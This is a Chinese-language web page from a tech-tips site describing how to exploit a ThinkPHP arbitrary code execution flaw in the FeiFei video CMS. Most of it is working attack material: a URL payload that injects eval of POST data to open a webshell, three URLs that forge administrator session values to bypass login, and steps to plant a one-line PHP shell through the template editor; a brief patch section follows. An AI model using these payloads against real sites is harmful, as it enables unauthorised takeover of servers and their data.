当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行漏洞利用

时间:2015/5/19 18:49:37 作者:平凡之路 来源:xuhantao.com 浏览:

第一个方法 直接执行
/index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html
直接拿菜刀连接。

 



 

第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,涛涛电脑知识网,依次执行下边三条。
在地址栏直接输入
index.php?s=vod-search-area-${@$_SESSION[AdminLogin]=1}.html

index.php?s=vod-search-area-${@$_SESSION[C(USER_AUTH_KEY)]=1}.html

index.php?s=vod-search-area-${@$_SESSION[admin_ok]=chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49)}.html

执行完毕登录后台。
直接地址栏输入
index.php?s=admin-index
index.php?s=Admin-Index-Top

index.php?s=Admin-Index-Top

s=Admin-Tpl-Show
/index.php?s=Admin-Cache-Show
/index.php?s=Admin-Tpl-Show-id-.|Tpl|default


拿shell,模版管理,随便点击一个模版,然后点编辑,然后输入路径,把名字改成xx.php写上一句话。

 修复方案:该URL安全漏洞会造成用户在客户端伪造URL,www.xuhantao.com,执行非法代码。

影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序。


下载地址:

修正方法:

首先解压缩安全补丁文件。
2.1和2.2版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Think/Util/目录下的同名文件

3.0版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Core/目录下面的同名文件
替换补丁包中的CheckRouteBehavior.class.php 文件到 ThinkPHP/Lib/Behavior/目录下面的同名文件
 

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1